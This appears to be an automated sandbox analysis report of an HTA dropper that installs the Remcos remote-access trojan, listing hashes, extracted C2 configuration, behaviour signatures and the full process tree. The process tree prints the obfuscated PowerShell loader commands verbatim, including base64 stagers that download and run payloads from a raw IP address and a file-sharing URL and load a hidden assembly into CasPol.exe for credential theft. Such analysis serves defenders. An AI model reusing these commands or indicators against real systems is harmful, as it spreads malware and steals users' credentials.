Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-11-2024 16:57

General

  • Target

    seethebestthingswithgoodthingswithgreatthignsfor.hta

  • Size

    281KB

  • MD5

    b36b8c1d87172cd3d7646f53a58d4936

  • SHA1

    f816a31bcb508052f54fa572eddf2e84ed7eef0c

  • SHA256

    134d52fbb53944f8d09eb33663c83f406e5fa15996afe1bb7e95eeef99298821

  • SHA512

    188c4f4b2a3e8659edf4fb88dd8cea3d91c3a44caa5b9350705393b65272538b63b581f6a044b2d24f74b1ba42cd2f9328e5253a690182235b093cd7ee57bf8e

  • SSDEEP

    48:4FhWsTROELdn97g5un7MqnQKb4VwoIADQKp4VwoIA8S29++RWPi+8d6Ba5L1nNQk:43FZ97HnQ8iQsrkV8d6Ba1jQtQsMpQpQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Extracted

Family

remcos

Botnet

RemoteHost

C2

shlobo.duckdns.org:9687

shlobo.duckdns.org:9374

shlobo.duckdns.org:8764

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-U2TQ1C

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethebestthingswithgoodthingswithgreatthignsfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3912
    • C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
      "C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'JGtrUUk4aCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRXJkRUZpbklUaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFVWcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6bSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0dqbVhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWVZsc3VVTixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3FCamhCSkdxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJaIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdmV0NjeUhvR0wgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAka2tRSThoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjQ2LjE3OC4xOTIvMzUvc2VldGhlYmVzdGdpcmxzZXZlcmRpZGJlc3R0aGlnbnN3aXRobXlzZWxmLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMiLDAsMCk7c1RBclQtU2xlRXAoMyk7c3RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0Z2lybHNldmVyZGlkYmVzdHRoaWducy52YnMi'+[cHar]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3424
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1528
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1068
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9664.tmp" "c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3448
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4532
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRQc2hPTWVbNF0rJHBzSG9tRVszMF0rJ3gnKSggKCgnQU04aW1hZ2VVcmwgPSB5OWNuaHR0cHM6Ly8xMDE3LmZpbGVtJysnYWlsLmNvbS9hJysncGkvZicrJ2lsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDdCVTEnKydrVmdzZDlwVDlwZ1NTbHZTdEdyblRJQ2ZGaG1US2ozTEM2U1F0SWNPY18nKydUMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiB5OWNuO0FNOHdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7QU04aW1hZ2VCeXRlcyA9IEFNJysnOHdlYkNsaWVudC5Eb3dubG9hZERhdGEoQU04aW1hZ2UnKydVcmwpO0FNOGltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKEFNJysnOGltYWdlQnl0ZScrJ3MpO0FNOHN0YXJ0RmxhZyA9IHk5Y248PCcrJ0JBU0U2NF9TVEFSVD4+eTljbjtBTThlbmRGbGFnJysnID0geTljbjw8QkEnKydTRTY0JysnX0VORD4+eTljbjtBTThzdGFydEluZGV4ID0gQScrJ004aW1hZ2VUZXh0LicrJ0luJysnZGV4T2YoQU04c3RhcnRGbGFnJysnKTtBJysnTThlbmRJbmRleCA9IEFNOGltYWdlVGV4dC5JbmRleE9mKEFNOGVuZEZsYWcpO0FNOHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBBTThlbmRJbmRleCAtZ3QgQU04c3RhcnRJbicrJ2QnKydleDtBTThzdGFydEluZGV4ICs9IEFNOHN0YXJ0RmxhZy5MZScrJ25ndCcrJ2g7QU04YmFzZTY0TGVuZ3RoID0gQU04ZW5kSW5kZXggLSBBTThzdGFydEluZGV4JysnO0FNOGJhc2U2NENvbW1hbmQgPSBBTThpbWFnZVRleHQuU3ViJysnc3RyaScrJ25nKEFNOHN0YXJ0SW5kZXgsIEFNOGJhc2U2NExlbmd0aCk7JysnQU04JysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoQU04YmFzZTY0Q29tbWFuZC4nKydUb0NoYXJBcnJheSgpIFBNVzYgRm9yRWFjaC1PYmplY3QgeyBBTThfIH0pWy0xLi4tKEFNOGJhc2UnKyc2NENvbW1hbmQuTGVuZ3RoKV07JysnQU0nKyc4Y29tbWFuJysnZEJ5dGVzID0gW1MnKyd5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhBTThiYXNlNjRSZXZlcnNlZCk7QU04bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEFNOGNvbW1hbmRCeXRlcyk7QU04dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh5OWNuVkFJeTljbik7QU04dmFpTWV0aG9kLkknKydudm9rZShBTThudWxsLCBAKHk5Y250eHQuRVJGVkdSRkUvNTMvMjkxLjg3MS42NC44OTEvLzpwdHRoeTljbiwgeTljbmRlc2F0JysnaXZhZG95OWNuLCB5OWNuZGVzYXRpdmFkb3k5Y24nKycsIHk5Y25kZXNhdGl2YWRveTljbiwgeTljbkNhc1BvbHk5YycrJ24sIHk5Y25kZXNhdGl2YWRveScrJzljbiwgeTljbmRlc2F0aXZhZG95OWNuLHk5Y25kZXNhdGl2YWRveTljJysnbix5OWNuZGVzYXRpdmFkb3k5Y24seTljbmRlc2F0aXZhZG95OWNuLHk5JysnY25kZXNhdGl2YWRveTljbix5OWNuZGVzYXQnKydpdmFkb3k5Y24seTljbjF5OWNuLHk5Y25kZXNhdGl2YWRveTljbikpOycpICAtY1JlcGxBY2UnUE1XNicsW0NoQVJdMTI0ICAtY1JlcGxBY2UoW0NoQVJdMTIxK1tDaEFSXTU3K1tDaEFSXTk5K1tDaEFSXTExMCksW0NoQVJdMzktcmVQTEFjZShbQ2hBUl02NStbQ2hBUl03NytbQ2hBUl01NiksW0NoQVJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1220
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3228
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1660
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1072
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zkgeuvdxthpzlqtrncnddmlm"
                7⤵
                • Accesses Microsoft Outlook accounts
                • System Location Discovery: System Language Discovery
                PID:4944
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\bmtxvoorhphmowpvxnaworgvzeps"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4140

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    102B

    MD5

    ec4f509f9f4b3b8421920e041d0e2fb8

    SHA1

    5cee677e9e20bc9bb2a9ca23106da533d81b2b00

    SHA256

    49f7d448f66eac13abeb7bf296f6443c7b643fc7ab39703acfc9b882851a6d35

    SHA512

    e9d7d67d9d47e2744e5408b45bbfeb448d130238152a78415b6611b99eb44a1d45f889e4e0a75e712541122f40030d08369b0ffb14e36ceb2fe984c23cd53c2e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powerSHELl.eXE.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    f6e3380275aaaaca9f8590cd6a4799c5

    SHA1

    57d44d08df5eef95522927b72f32ce632dc33023

    SHA256

    09fbf5047273386f082b10758c13e54f10804f99357fac2e029e006f19edd965

    SHA512

    90194e77a76aa23145c753732d4b13e030de307afdda77897375c5f4c854d0c08523d7a7eccfee8ae3338cf81d9d2bec72091bdb3c9e90a34036c3d1a90e0ba1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    15456a5c09cc22fa355b2e615b485813

    SHA1

    47a44aefb3ec5df806ed63e8987836e5c99b9c90

    SHA256

    fc6916cab883c538cdb0903a86649b42e4bea48897e7904084c17af5a33188c4

    SHA512

    2d94a1b6c806642c0e0404b908a2f43b7ee6fcb05447cb3f68ad4ae0f1f19194aa0a100864cb2aa08c2de5c5b2969f33932358eea94c089c6dc99cf7e2657062

  • C:\Users\Admin\AppData\Local\Temp\RES9664.tmp

    Filesize

    1KB

    MD5

    cd1d6ebb844feaab4dcf017932c546b1

    SHA1

    6806659cf5ed03b786aee5ea7846b6baa96e4882

    SHA256

    75f469e974f77cbc719090600ec3baf89edddf62c6f8ce0ec1027386874f6c91

    SHA512

    207bb866066cf3cb59bdb9d2eb314a3e2697a4be2e1acdd9de74fdaf79663ba94b311b220ed1c2fea3942713da0b536adab076f458d9fde6f801708062345966

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2q0qygau.jpn.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\oqamudsefzxubcffwstba

    Filesize

    4KB

    MD5

    79f35c7500a5cc739c1974804710441f

    SHA1

    24fdf1fa45049fc1a83925c45357bc3058bad060

    SHA256

    897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4

    SHA512

    03281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e

  • C:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.dll

    Filesize

    3KB

    MD5

    33c218c6a023474d5009560a703321ae

    SHA1

    08feb6bf8448a02cdd4117b79e2e5fcd53f41920

    SHA256

    4a40f2e65053ecfd480f0d7b266c7d93ca1e0d3e9e30a8eaf05a07c74bbfcff4

    SHA512

    36a7752fce4ef5aa283291e04458a258a8f4dcec3ad4ea58902289826c64ad80cf4483abc0b48c95420357efbfd4fe46ada3ecca1474c954de96d305f05f2090

  • C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs

    Filesize

    138KB

    MD5

    8e033f9bcfdc081ed84adcbf69b2cfed

    SHA1

    29919300cdba9322ec872189cea15ff7d573fc42

    SHA256

    4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a

    SHA512

    58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\CSCD13CE69C3ABA435D9E52E09D9D384042.TMP

    Filesize

    652B

    MD5

    e61bf3a4f4e429954fe9a30eeb27d236

    SHA1

    93fb9a59a680703b952825d03ee26d9f9de1ee43

    SHA256

    1d5224bae9d877e37cd81423e7ec6945fa8ff8351347253247d60db23762d2a0

    SHA512

    a2945a998d83bd388a74f95e8e7d190751687bc70089454832497022854411f90ac167d320cda149999c5faf2fe14a52375329d05d962d4971c5776b665aaf88

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.0.cs

    Filesize

    464B

    MD5

    39d4a6691d37c11ed58d537b74f12aad

    SHA1

    caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6

    SHA256

    0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1

    SHA512

    f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c

  • \??\c:\Users\Admin\AppData\Local\Temp\ttk1ndd0\ttk1ndd0.cmdline

    Filesize

    369B

    MD5

    0ede2df604e147f5eb1c311b1721d351

    SHA1

    23333ef884816d64339eb5f8f5a87282404e0640

    SHA256

    526748a6a92d383ebf7ab651d7224aafed1bb56aa1a66a484d552cb3535b7a54

    SHA512

    710294fab258fc9786bbbebf5daafbf69ffbe1af946febe0c91baa7366739757ee2b4de9561f4bf01b01729dbf4860ee7088589d9ca999bd10d65f0cacd0c5af

  • memory/1072-123-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1072-130-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1072-125-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1220-91-0x0000000005A30000-0x0000000005D84000-memory.dmp

    Filesize

    3.3MB

  • memory/1528-45-0x0000000007830000-0x00000000078C6000-memory.dmp

    Filesize

    600KB

  • memory/1528-29-0x0000000007450000-0x0000000007482000-memory.dmp

    Filesize

    200KB

  • memory/1528-44-0x0000000007600000-0x000000000760A000-memory.dmp

    Filesize

    40KB

  • memory/1528-43-0x00000000075A0000-0x00000000075BA000-memory.dmp

    Filesize

    104KB

  • memory/1528-46-0x00000000077A0000-0x00000000077B1000-memory.dmp

    Filesize

    68KB

  • memory/1528-47-0x00000000077D0000-0x00000000077DE000-memory.dmp

    Filesize

    56KB

  • memory/1528-48-0x00000000077E0000-0x00000000077F4000-memory.dmp

    Filesize

    80KB

  • memory/1528-49-0x00000000078F0000-0x000000000790A000-memory.dmp

    Filesize

    104KB

  • memory/1528-50-0x0000000007820000-0x0000000007828000-memory.dmp

    Filesize

    32KB

  • memory/1528-42-0x0000000007BE0000-0x000000000825A000-memory.dmp

    Filesize

    6.5MB

  • memory/1528-41-0x0000000007490000-0x0000000007533000-memory.dmp

    Filesize

    652KB

  • memory/1528-40-0x0000000006800000-0x000000000681E000-memory.dmp

    Filesize

    120KB

  • memory/1528-30-0x000000006D480000-0x000000006D4CC000-memory.dmp

    Filesize

    304KB

  • memory/1660-157-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-165-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-173-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-164-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-158-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-137-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-150-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-149-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-141-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-172-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-109-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-106-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-140-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/1660-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-115-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1660-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/3228-103-0x0000000007280000-0x000000000731C000-memory.dmp

    Filesize

    624KB

  • memory/3228-102-0x0000000007120000-0x0000000007278000-memory.dmp

    Filesize

    1.3MB

  • memory/3424-72-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-19-0x00000000060F0000-0x000000000613C000-memory.dmp

    Filesize

    304KB

  • memory/3424-4-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-0-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

    Filesize

    4KB

  • memory/3424-65-0x0000000006680000-0x0000000006688000-memory.dmp

    Filesize

    32KB

  • memory/3424-71-0x0000000070BCE000-0x0000000070BCF000-memory.dmp

    Filesize

    4KB

  • memory/3424-73-0x0000000007480000-0x00000000074A2000-memory.dmp

    Filesize

    136KB

  • memory/3424-3-0x0000000005180000-0x00000000057A8000-memory.dmp

    Filesize

    6.2MB

  • memory/3424-74-0x0000000008340000-0x00000000088E4000-memory.dmp

    Filesize

    5.6MB

  • memory/3424-2-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-5-0x00000000050F0000-0x0000000005112000-memory.dmp

    Filesize

    136KB

  • memory/3424-6-0x00000000059E0000-0x0000000005A46000-memory.dmp

    Filesize

    408KB

  • memory/3424-7-0x0000000005A50000-0x0000000005AB6000-memory.dmp

    Filesize

    408KB

  • memory/3424-81-0x0000000070BC0000-0x0000000071370000-memory.dmp

    Filesize

    7.7MB

  • memory/3424-1-0x0000000004B10000-0x0000000004B46000-memory.dmp

    Filesize

    216KB

  • memory/3424-17-0x0000000005AC0000-0x0000000005E14000-memory.dmp

    Filesize

    3.3MB

  • memory/3424-18-0x00000000060C0000-0x00000000060DE000-memory.dmp

    Filesize

    120KB

  • memory/4140-126-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4140-128-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4140-129-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4944-131-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4944-124-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4944-127-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB